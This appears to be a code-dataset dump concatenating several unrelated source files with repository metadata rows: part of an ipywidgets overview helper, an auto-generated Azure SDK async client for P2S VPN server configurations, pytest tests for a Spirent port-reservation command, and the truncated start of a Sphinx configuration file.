selects={k: v for k, v in widget_dict.items() if k in ['Dropdown', 'Select', 'SelectMultiple']},
media={k: v for k, v in widget_dict.items() if k in ['Audio', 'Image', 'Play', 'Video']}
)
all_so_far = [name for k, v in groups.items() for name in v.keys()]
groups['others'] = {k: v for k, v in widget_dict.items() if k not in all_so_far}
elif organize_by == 'module':
groups = defaultdict(dict)
for k, v in widget_dict.items():
module_name = extract_module_name(v)
# Grab just the very last part of the module name for a nicer title
module_name = module_name.split('_')[-1]
groups[module_name][k] = v
return groups
def list_overview_widget(groups,
help_url_base='',
columns=3,
min_width_single_widget=300):
"""
Create an tab-based display of all of the widgets in ``groups``, with
a separate tab for each key in groups and links to more detail for each
widget. The first line of the docstring of each widget provides a
short description of the widget.
Parameters
----------
groups : dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` should have the name of the widget to be displayed as
the key and the class of the widget as the value.
help_url_base : str, optional
URL to prepend to the help link for each widget.
columns : int, optional
Number of columns to use in displaying the widgets.
min_width_single_widget : int, optional
Minimum width, in pixels, of a widget displayed on a tab.
Returns
-------
widgets.Tab
A ``Tab`` widget with one tab for key of groups in which all of
the widgets in that group are displayed.
"""
tabs = widgets.Tab()
if help_url_base is None:
help_url_base = 'https://ipywidgets.readthedocs.io/en/stable/examples/Widget%20List.html'
titles = []
kids = []
def box_maker(name, widget, group):
layout = widgets.Layout(grid_template_columns="1fr",
border='2px solid gray')
b = widgets.GridBox(layout=layout)
module = extract_module_name(widget, full=True)
#print(' ', widget.__name__, module)
if 'selection' in module:
extra_args = dict(options=[1, 2, 3])
elif 'progress' in widget.__name__.lower():
extra_args = dict(value=50)
elif 'gridspeclayout' in widget.__name__.lower():
extra_args = dict(n_rows=3, n_columns=3)
else:
extra_args = {}
wid = widget(description='A label!', **extra_args)
try:
short_description = wid.__doc__.split('\n')[0]
if not short_description:
short_description = wid.__doc__.split('\n')[1]
except AttributeError:
short_description = ''
url = f'{help_url_base}#{name}'
if help_url_base == '':
help_link = f'<h3><a href="{url}" rel="nofollow" target="_self" style="color:gray;">{name}</a></h3><p>{short_description}</p>'
else:
magic_stuff = 'data-commandlinker-command="rendermime:handle-local-link" data-commandlinker-args="{"path":"04.00-widget-list.ipynb","id":"#IntRangeSlider"}"'
help_link = f'<h3><a href="{url}" rel="nofollow" target="_blank" style="color:gray;" {magic_stuff}>{name}</a></h3><p>{short_description}</p>'
title = widgets.HTML(value=help_link)
title.layout.padding = '10px'
b.layout.overflow_x = 'hidden'
b.children = [title, wid]
return b
for group, group_widgets in groups.items():
# print(group)
titles.append(group)
col_spec = f"repeat({columns}, minmax({min_width_single_widget}px, 1fr)"
layout = widgets.Layout(grid_template_columns=col_spec,
grid_gap='10px 10px')
kid = widgets.GridBox(layout=layout)
kid.children = [box_maker(k, v, group) for k, v in group_widgets.items()]
kids.append(kid)
tabs.children = kids
for i, title in enumerate(titles):
nice = title.replace('_', ' ')
tabs.set_title(i, nice.title())
return tabs
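# --- Editor's usage sketch (not part of the original helper) ------------------------------
# How the two helpers above are typically combined in a notebook; displaying the resulting
# Tab widget (for example with IPython.display.display) is left to the calling cell.
# groups = organized_widgets(organize_by='ui')
# tabs = list_overview_widget(groups, columns=2)
# display(tabs)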
| [
"[email protected]"
] | |
9969606a2dac6ff81118988c97c9fc5a469e593a | 1a166165ab8287d01cbb377a13efdb5eff5dfef0 | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/aio/operations/_p2_svpn_server_configurations_operations.py | f65a8a822f3417fc8e16dbaf0b1f3ae67ffef1ac | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | manoj0806/azure-sdk-for-python | 7a14b202ff80f528abd068bf50334e91001a9686 | aab999792db1132232b2f297c76800590a901142 | refs/heads/master | 2023-04-19T16:11:31.984930 | 2021-04-29T23:19:49 | 2021-04-29T23:19:49 | 363,025,016 | 1 | 0 | MIT | 2021-04-30T04:23:35 | 2021-04-30T04:23:35 | null | UTF-8 | Python | false | false | 23,195 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class P2SVpnServerConfigurationsOperations:
"""P2SVpnServerConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> "_models.P2SVpnServerConfiguration":
"""Retrieves the details of a P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the P2SVpnServerConfiguration.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: P2SVpnServerConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
p2_s_vpn_server_configuration_parameters: "_models.P2SVpnServerConfiguration",
**kwargs
) -> "_models.P2SVpnServerConfiguration":
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(p2_s_vpn_server_configuration_parameters, 'P2SVpnServerConfiguration')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
p2_s_vpn_server_configuration_parameters: "_models.P2SVpnServerConfiguration",
**kwargs
) -> AsyncLROPoller["_models.P2SVpnServerConfiguration"]:
"""Creates a P2SVpnServerConfiguration to associate with a VirtualWan if it doesn't exist else
updates the existing P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the VirtualWan.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:param p2_s_vpn_server_configuration_parameters: Parameters supplied to create or Update a
P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_parameters: ~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either P2SVpnServerConfiguration or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
p2_s_vpn_server_configuration_name=p2_s_vpn_server_configuration_name,
p2_s_vpn_server_configuration_parameters=p2_s_vpn_server_configuration_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes a P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the P2SVpnServerConfiguration.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
p2_s_vpn_server_configuration_name=p2_s_vpn_server_configuration_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
def list_by_virtual_wan(
self,
resource_group_name: str,
virtual_wan_name: str,
**kwargs
) -> AsyncIterable["_models.ListP2SVpnServerConfigurationsResult"]:
"""Retrieves all P2SVpnServerConfigurations for a particular VirtualWan.
:param resource_group_name: The resource group name of the VirtualWan.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListP2SVpnServerConfigurationsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_12_01.models.ListP2SVpnServerConfigurationsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListP2SVpnServerConfigurationsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_virtual_wan.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListP2SVpnServerConfigurationsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_virtual_wan.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations'} # type: ignore
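    # --- Editor's usage sketch (not part of the generated client) ------------------------
    # These operations are normally reached through the async NetworkManagementClient; the
    # operation-group attribute name and the credential wiring below are assumptions for
    # illustration, not something this file defines.
    #
    #   from azure.identity.aio import DefaultAzureCredential
    #   from azure.mgmt.network.aio import NetworkManagementClient
    #
    #   client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
    #   poller = await client.p2s_vpn_server_configurations.begin_create_or_update(
    #       "<resource-group>", "<virtual-wan>", "<config-name>", config_parameters)
    #   result = await poller.result()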
| [
"[email protected]"
] | |
d99a029c03dcdfe98683393cb23dc737e077714b | 83316dd8a01070711fe8c42cd38d245da9a4711e | /testmethodology/trafficcenter/stakunittest/test_ReservePortsCommand.py | 7a598086724fe16870f4f35fbce33f81dbe7a643 | [] | no_license | CmWork/STAKCommands | fa46d561d0a85ac49c14f1b1fc6c014d2e0955bc | 8b3fb68912116f7973fa9b3677d4e3d43c92f194 | refs/heads/master | 2020-05-02T00:57:20.940300 | 2015-07-10T04:32:37 | 2015-07-10T04:32:37 | 38,860,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,946 | py | import copy
import json
import pytest
from mock import MagicMock, patch
from StcIntPythonPL import CStcSystem, CScriptableCreator, RelationType, CHandleRegistry
from spirent.methodology.trafficcenter.ReservePortsCommand import *
import spirent.methodology.trafficcenter.ReservePortsCommand
partial_topology_config = [
{
'name': 'West',
'subnet_configs': [
{
'subnet': {
'name': 'name_1',
'id': '1234'
},
'ports': [{'location': '//10.1.1.1/1/1'}]
},
{
'subnet': {
'name': 'name_2',
'id': '1235'
},
'ports': [{'location': '//10.1.1.2/1/1'}]
},
]
},
{
'name': 'East',
'subnet_configs': [
{
'subnet': {
'name': 'name_3',
'id': '1236'
},
'ports': [{'location': '//10.1.1.3/1/1'}]
},
{
'subnet': {
'name': 'name_4',
'id': '1237'
},
'ports': [{'location': '//10.1.1.4/1/1'}]
},
]
}
]
@pytest.fixture
def clean_up_ports(request, stc):
def cleanup():
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
for port in ports:
port.MarkDelete()
request.addfinalizer(cleanup)
cleanup()
def test_validate():
assert validate(json.dumps(partial_topology_config)) == ''
def test_run(stc, clean_up_ports):
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = MagicMock()
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
assert run(json.dumps(partial_topology_config))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
assert ports[0].Get('location') == '//10.1.1.1/1/1'
assert ports[1].Get('location') == '//10.1.1.2/1/1'
assert ports[2].Get('location') == '//10.1.1.3/1/1'
assert ports[3].Get('location') == '//10.1.1.4/1/1'
assert not apply_mock.called
patcher.stop()
def test_empty_ports(stc, clean_up_ports):
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = MagicMock()
config_with_no_ports = copy.deepcopy(partial_topology_config)
config_with_no_ports[1]['subnet_configs'][1]['ports'] = []
with pytest.raises(RuntimeError):
with AutoCommand('spirent.methodology.trafficcenter.ReservePortsCommand') as cmd:
cmd.Set('TopologyConfig', json.dumps(config_with_no_ports))
cmd.Execute()
assert cmd.Get('Status') == 'ports on subnet name_4 is empty'
def simulate_online(port_handles):
ctor = CScriptableCreator()
for handle in port_handles:
port = CHandleRegistry.Instance().Find(handle)
phy = ctor.Create('EthernetCopper', port)
port.AddObject(phy, RelationType('ActivePhy'))
def test_change_speed(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
supported_phys_mock = MagicMock(return_value=['ETHERNET_100_GIG_FIBER'])
spirent.methodology.trafficcenter.ReservePortsCommand._get_supported_phys = supported_phys_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '100G'
run(json.dumps(config_with_speed))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
phys = [x.GetType() for x in ports[3].GetObjects('EthernetPhy')]
assert phys[0] == 'ethernetcopper'
assert phys[1] == 'ethernet100gigfiber'
phy = ports[3].GetObject('EthernetPhy', RelationType('ActivePhy'))
assert phy.Get('LineSpeed') == 'SPEED_100G'
assert phy.GetType() == 'ethernet100gigfiber'
assert apply_mock.called
patcher.stop()
def test_no_change_speed_does_not_apply(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '1G'
run(json.dumps(config_with_speed))
assert not apply_mock.called
def simulate_online_with_pos(port_handles):
ctor = CScriptableCreator()
for handle in port_handles:
port = CHandleRegistry.Instance().Find(handle)
phy = ctor.Create('POSPhy', port)
port.AddObject(phy, RelationType('ActivePhy'))
def test_only_support_ethernet(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online_with_pos)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '100G'
assert not run(json.dumps(config_with_speed))
def setup_physical_test_module(stc_sys):
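    # Build a fake chassis with one test module holding four single-port port
    # groups; used by the sibling-port tests below.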
ctor = CScriptableCreator()
chassis_mgr = ctor.Create('PhysicalChassisManager', stc_sys)
chassis = ctor.Create('PhysicalChassis', chassis_mgr)
test_module = ctor.Create('PhysicalTestModule', chassis)
test_module.Set('PortGroupSiblingCount', 4)
physical_ports = []
for i in range(1, 5):
physical_port_group = ctor.Create('PhysicalPortGroup', test_module)
physical_port_group.Set('Index', i)
physical_port_group.Set('ReservedByUser', False)
physical_port = ctor.Create('PhysicalPort', physical_port_group)
location = "//10.100.1.1/1/%s" % i
physical_port.Set('Location', location)
physical_port_group.AddObject(physical_port, RelationType('ParentChild'))
physical_ports.append(physical_port)
return physical_ports
@pytest.fixture
def clean_up_physical_test_module(request, stc):
def cleanup():
chassis_manager = CStcSystem.Instance().GetObject('PhysicalChassisManager')
chassis_manager.MarkDelete()
request.addfinalizer(cleanup)
cleanup()
clean_up_ports(request, stc)
def test_get_sibling_ports(stc, clean_up_ports):
ctor = CScriptableCreator()
stc_sys = CStcSystem.Instance()
project = stc_sys.GetObject('Project')
physical_ports = setup_physical_test_module(stc_sys)
port = ctor.Create("Port", project)
physical_ports[0].AddObject(port, RelationType('PhysicalLogical'))
physical_port_group = physical_ports[0].GetParent()
physical_port_group.Set('ReservedByUser', True)
port.Set('IsVirtual', False)
ports = [port]
sibling_ports = get_sibling_ports(ports)
assert len(sibling_ports) == 1
assert len(sibling_ports[port]) == 3
i = 2
for sibling_port in sibling_ports[port]:
location = "//10.100.1.1/1/%s" % i
i += 1
assert sibling_port.Get('Location') == location
def test_change_speed_10M_100M(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[0]['subnet_configs'][0]['ports'][0]['speed'] = '10M'
config_with_speed[0]['subnet_configs'][1]['ports'][0]['speed'] = '100M'
run(json.dumps(config_with_speed))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
phys_list = [x.GetObjects('EthernetPhy') for x in ports[0:2]]
for phys in phys_list:
assert len(phys) == 1
assert phys[0].GetType() == 'ethernetcopper'
assert not phys[0].Get('AutoNegotiation')
assert apply_mock.called
patcher.stop()
def test_reset():
assert reset()
| [
"[email protected]"
] | |
3daeb98cf549c02dfd2bbba036a474e93b402841 | 5a281cb78335e06c631181720546f6876005d4e5 | /sahara-10.0.0/api-ref/source/conf.py | d7580249d82601bc268b6c35106c8df3c1ec2580 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 7,091 | py | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
